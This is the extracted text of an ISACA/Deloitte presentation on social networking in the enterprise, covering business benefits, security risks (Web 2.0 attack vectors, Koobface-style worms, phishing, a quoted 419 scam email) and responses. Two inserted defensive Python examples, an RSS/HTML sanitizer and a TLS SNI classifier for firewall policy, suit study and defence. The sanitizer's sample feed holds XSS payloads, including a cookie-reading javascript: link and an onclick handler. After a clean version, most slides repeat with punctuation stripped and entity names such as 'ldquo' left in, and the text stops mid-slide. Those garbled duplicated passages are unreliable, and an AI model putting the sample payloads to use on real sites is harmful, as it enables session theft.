Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
www.isaca.org 29
Enhance customer and partner relationships (cont.)
• Procter & Gamble
  – Capessa, launched in the "Yahoo Health" section of Yahoo.com, one of the world's leading internet destinations. Women who register with Capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving. http://realwomenrealadvice.com
www.isaca.org 30
Enhance customer and partner relationships (cont.)
• American Express
  – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs. http://www.openforum.com
www.isaca.org 31
Enhance customer and partner relationships (cont.)
• State of Louisville, Kentucky
  – Interactive audit findings on Web site. Allows the users to discuss previous audit findings. http://www.louisvilleky.gov/InternalAudit
www.isaca.org 32
Enhance customer and partner relationships (cont.)
• Amazon
  – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books. http://www.shelfari.com
www.isaca.org 33
Enhance customer and partner relationships (cont.)
• Bank of America (BofA)
  – On January 29, 2010, the Bank of America Web site was down. BofA used Twitter to keep in touch with its customers and let them know the latest update.
www.isaca.org 34
Risks and challenges
www.isaca.org 35
Risks and challenges
• Farmers and Mobsters
  – Top Facebook Applications
    • Source: http://statistics.allfacebook.com/applications/leaderboard (March 2010)
    • There are now more than 500,000 active applications on the Facebook Platform

Rank  Name                    Monthly Active Users
1     FarmVille               82,580,911
2     Static FBML             46,827,021
3     Birthday Cards          41,904,049
4     Café World              30,032,716
5     Facebook for iPhone     29,438,848
6     Texas HoldEm Poker      28,332,917
7     Slide FunSpace          25,630,033
8     Happy Aquarium (BETA)   24,915,971
9     Mafia Wars              24,704,179
10    Causes                  24,317,292
www.isaca.org 36
Risks and challenges (cont.)
• New security concerns and attack vectors — as a result of the shift in technology through Web services that are empowering server-side core technology components, as well as Asynchronous JavaScript and XML ("AJAX") and Rich Internet Application ("RIA") clients that are enhancing client-end interfaces in the browser itself
• Top 10 Web 2.0 Attack Vectors — http://net-square.com/whitepapers/Top10_Web20_AV.pdf
  – Cross-site scripting ("CSS") in AJAX, e.g. "Samy worm that exploited MySpace.com's CSS flaw"
  – XML poisoning — poison XML blocks coming from AJAX client
  – Malicious AJAX code execution — replay of cookies for each request
  – RSS/Atom injection — inject JavaScripts into the RSS feeds to generate attack on client browser
  – Web Services Definition Language ("WSDL") scanning and enumeration
  – Client-side validation in AJAX routines — fail to perform server-side checks
  – Web services routing issues — compromise of intermediate nodes
  – Parameter manipulation with SOAP — web services consume information and variables from SOAP
  – XPATH injection in SOAP message — bypass authentication mechanisms
  – RIA thick client binary manipulation — issues with session management
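The RSS/Atom injection vector above is what a feed aggregator must defend against: script and event-handler markup arriving in item content is rendered in the reader's browser. The following is an added example (not from the presentation or the net-square paper) of a consuming-side sanitizer for RSS 2.0 items using only the Python standard library; the allow-list of tags and attributes and the sample feed are constructed for the example.

```python
import xml.etree.ElementTree as ET
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allow-list of markup a feed reader may render (assumption chosen for this example).
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = {"http", "https"}
# Elements whose text content must be dropped too, not just their tags.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}


def safe_url(url):
    """Accept only absolute http(s) URLs; rejects javascript:, data: and scheme-less tricks."""
    parsed = urlparse(url.strip())
    return parsed.scheme.lower() in SAFE_SCHEMES and bool(parsed.netloc)


class FeedHtmlSanitizer(HTMLParser):
    """Re-emits only allow-listed tags and attributes; everything else becomes escaped text or is dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside a dropped element such as <script>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:  # on* handlers are never in the allow-list, so they vanish here
            if name in ALLOWED_ATTRS.get(tag, set()) and value is not None and safe_url(value):
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag == "br":
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data))  # text is always re-escaped, so injected '<' never becomes markup


def sanitize_html(fragment):
    parser = FeedHtmlSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def sanitize_rss(xml_text):
    """Parse an RSS 2.0 document and return items that are safe to render: cleaned description, vetted link."""
    root = ET.fromstring(xml_text)
    items = []
    for item in root.iter("item"):
        link = (item.findtext("link") or "").strip()
        items.append({
            "title": escape(item.findtext("title", default="")),
            "link": link if safe_url(link) else None,   # a javascript: link is dropped, not rendered
            "description": sanitize_html(item.findtext("description", default="")),
        })
    return items


# Constructed sample: a feed item carrying the kinds of payload the attack vector describes.
SAMPLE_RSS = """<rss version="2.0"><channel><title>constructed feed</title>
<item><title>Update &amp; news</title><link>javascript:alert(document.cookie)</link>
<description><![CDATA[<p onclick="steal()">Hello <b>world</b><script>alert(1)</script>
<a href="javascript:x()">bad</a> <a href="https://example.com/post">ok</a></p>]]></description></item>
</channel></rss>"""

if __name__ == "__main__":
    for entry in sanitize_rss(SAMPLE_RSS):
        print(entry)
```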
www.isaca.org 37
Risks and challenges (cont.)
• Example worms / phishing attacks affecting social networking sites
  – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data
  – Fbaction – Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account
www.isaca.org 38
Risks and challenges (cont.)
  – Boface – convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user's Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
• Common element – they all take advantage of the implied trust that social networking users have with each other
www.isaca.org 39
Risks and challenges (cont.)
"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening." – Marcus Ranum in InfoSec Magazine, May 2008
• Trust — Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are starting to appear, often as plug-ins for social media tools
• May also take advantage of URL shortening – bit.ly, tr.im, tinyurl.com, etc.
www.isaca.org 40
Risks and challenges (cont.)
• More on phishing — social networks are a target-rich environment
www.isaca.org 41
Risks and challenges (cont.)
• More on phishing — social networks are a target-rich environment (cont.)
"Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now. i was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School; my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it my father died last year………" – See http://www.419legal.org for more details
• The 419 scams have evolved with the technology – now using LinkedIn to target specific individuals
www.isaca.org 42
Risks and challenges (cont.)
• Reputation — Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of a response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized
• Copyright violation — Third-party material such as essays, articles and photographs is used without written consent from the proprietor
• Intellectual Property theft — Harder to prevent inadvertent data leakage through the one-to-many nature of Web 2.0 as a medium
www.isaca.org 43
Risks and challenges (cont.)
• Failures in the use of Social Media — most companies that use Social Media don't approach it the way they would with other mission critical technology
  – At best it can be said that most companies today are merely dabbling with Social Media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail
"Fully half of all Social Media investments will fail" — Gartner
www.isaca.org 44
Risks and challenges (cont.)
"When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'cookie monster sings chocolate rain' about 1,000 times." – Michael Scott from The Office
• Productivity — Users employ social media tools for nonproductive purposes such as socializing ("Social Notworking")
http://news.bbc.co.uk/2/hi/business/8325865.stm
www.isaca.org 45
Risks and challenges (cont.)
• Technical Integration — Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – Sign in using your account with:
    • Facebook
    • Twitter
    • Myspace
    • Yahoo
    • Google
    • Windows Live ID
    • AOL
    • Blogger
    • WordPress
    • Netlog
    • OpenID
    • flickr
www.isaca.org 46
Risks and challenges (cont.)
• Information hoarding — In many industries value is placed on what an employee knows that others do not know. This belief prevents data sharing
• Quantification — Researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom's law, which states that — "The value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user and summed for all"
  Or, alternatively:
  – http://en.wikipedia.org/wiki/Beckstrom's_law
www.isaca.org 47
Risks and challenges (cont.)
• Litigation issues — Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation issues
www.isaca.org 48
A quick word on privacy
"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time."
— Mark Zuckerberg, Facebook founder
"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place."
— Eric Schmidt, CEO, Google Inc.
www.isaca.org 49
A quick word on privacy (cont.)
• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data in use
• Data remanence: limited attempt to address
www.isaca.org 50
Responding to the risks and challenges
• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Define consequences for failure to comply, e.g. "termination of employment and legal action"
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
www.isaca.org 51
Responding to the risks and challenges
• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
www.isaca.org 52
Responding to the risks and challenges (cont.)
• Vulnerability Assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that Social Networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on Ports 80 & 443
  – Next-generation firewall technology that offers granular control of social networking functionality
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real-time
    • Visibility and policy control over application access
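"Identify applications regardless of port ... or SSL" means the firewall has to read what the client itself declares, not the destination port; for TLS the usable signal before the tunnel goes opaque is the Server Name Indication (SNI) in the ClientHello. The following is an added example, not code from the presentation or from any firewall vendor: a bounds-checked SNI extractor plus a classification and policy step. The domain-to-application table, the allow/deny policy and the ClientHello builder used as sample traffic are all constructed for this example.

```python
import struct

# Constructed signature table and policy for the example; a real product ships and updates its own.
APP_SIGNATURES = {
    "facebook.com": "facebook",
    "fbcdn.net": "facebook",
    "twitter.com": "twitter",
    "myspace.com": "myspace",
    "linkedin.com": "linkedin",
}
APP_POLICY = {"facebook": "deny", "myspace": "deny", "twitter": "allow", "linkedin": "allow"}


def extract_sni(record: bytes):
    """Return the host_name from the SNI extension of a TLS ClientHello record, or None.

    Every length field is bounds-checked so a truncated record or a non-TLS byte string
    (for instance cleartext HTTP sent to port 443) yields None rather than an exception.
    """
    if len(record) < 5 or record[0] != 0x16:          # TLS record type 0x16 = handshake
        return None
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != 0x01:                   # handshake type 0x01 = client_hello
        return None
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    pos = 2 + 32                                       # skip client_version and random
    if len(body) < pos + 1:
        return None
    pos += 1 + body[pos]                               # session_id
    if len(body) < pos + 2:
        return None
    pos += 2 + struct.unpack("!H", body[pos:pos + 2])[0]   # cipher_suites
    if len(body) < pos + 1:
        return None
    pos += 1 + body[pos]                               # compression_methods
    if len(body) < pos + 2:
        return None                                    # no extensions block present
    ext_end = pos + 2 + struct.unpack("!H", body[pos:pos + 2])[0]
    pos += 2
    while pos + 4 <= min(ext_end, len(body)):
        ext_type, ext_len = struct.unpack("!HH", body[pos:pos + 4])
        pos += 4
        data = body[pos:pos + ext_len]
        pos += ext_len
        if ext_type != 0x0000 or len(data) < 2:        # 0x0000 = server_name extension
            continue
        p = 2                                          # skip ServerNameList length
        while p + 3 <= len(data):
            name_type = data[p]
            name_len = struct.unpack("!H", data[p + 1:p + 3])[0]
            p += 3
            if p + name_len > len(data):
                return None                            # truncated name: treat as unidentifiable
            if name_type == 0:                         # host_name
                return data[p:p + name_len].decode("ascii", "replace").lower().rstrip(".")
            p += name_len
    return None


def identify_application(sni):
    """Map a server name to an application label by exact or parent-domain match."""
    if sni is None:
        return "unknown"
    for domain, app in APP_SIGNATURES.items():
        if sni == domain or sni.endswith("." + domain):
            return app
    return "other"


def policy_decision(record: bytes, dst_port: int):
    """Classify a flow by what the ClientHello declares; dst_port is deliberately not consulted."""
    app = identify_application(extract_sni(record))
    return app, APP_POLICY.get(app, "allow")


def build_client_hello(server_name: str) -> bytes:
    """Build a minimal TLS 1.2 ClientHello carrying only an SNI extension (constructed sample traffic)."""
    host = server_name.encode("ascii")
    entry = b"\x00" + struct.pack("!H", len(host)) + host          # name_type host_name(0) + name
    server_name_list = struct.pack("!H", len(entry)) + entry
    sni_ext = struct.pack("!HH", 0x0000, len(server_name_list)) + server_name_list
    body = (b"\x03\x03" + bytes(32)                                # client_version, random
            + b"\x00"                                              # empty session_id
            + b"\x00\x02\xc0\x2f"                                  # one cipher suite
            + b"\x01\x00"                                          # compression: null only
            + struct.pack("!H", len(sni_ext)) + sni_ext)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


if __name__ == "__main__":
    # Same application is recognised on a non-standard port, which a port-based rule would miss.
    print(policy_decision(build_client_hello("www.facebook.com"), 8443))
```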
www.isaca.org 53
What is next in the world of social networking
www.isaca.org 54
Where we are at today
• Enterprise Social Media has crossed the tipping point and is no longer considered an "emerging" technology
"The Hype Cycle" http://en.wikipedia.org/wiki/Hype_cycle
www.isaca.org 55
What's next in the world of social networking
• Increase in the use of mobile devices to access Social Networks
  – Over 600 million people will use their phone to access Social Networks by 2013, an increase of more than 400% over the 2009 figure of 140 million. Source — eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social Networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them
www.isaca.org 56
Some further predictions
• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war" — Mark Zuckerberg, Facebook founder
  – "(Twitter is)… Something important that has the potential to change the world, though we have a long way to go" — Biz Stone, Co-founder of Twitter
www.isaca.org 57
Q&A
www.isaca.org 58
Today's Presenters
Nelson Gibbs, Senior Manager, AERS – Audit & Enterprise Risk Services, Deloitte & Touche LLP, ngibbs@deloitte.com, +1 213 593 4241
www.isaca.org 59
Appendix
• Additional resources
  – Gopal, Raj et al., "Web 2.0 reinvents corporate networking", Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – "Great Wall of Facebook: The Social Network's Plan to Dominate the Internet — and Keep Google Out" by Fred Vogelstein, Wired Magazine (June 2009) http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – "The Future is Social, Not Search, Facebook COO Says" by Ryan Singel, Wired Magazine (October 2009) http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
www.isaca.org 60
This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.
Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
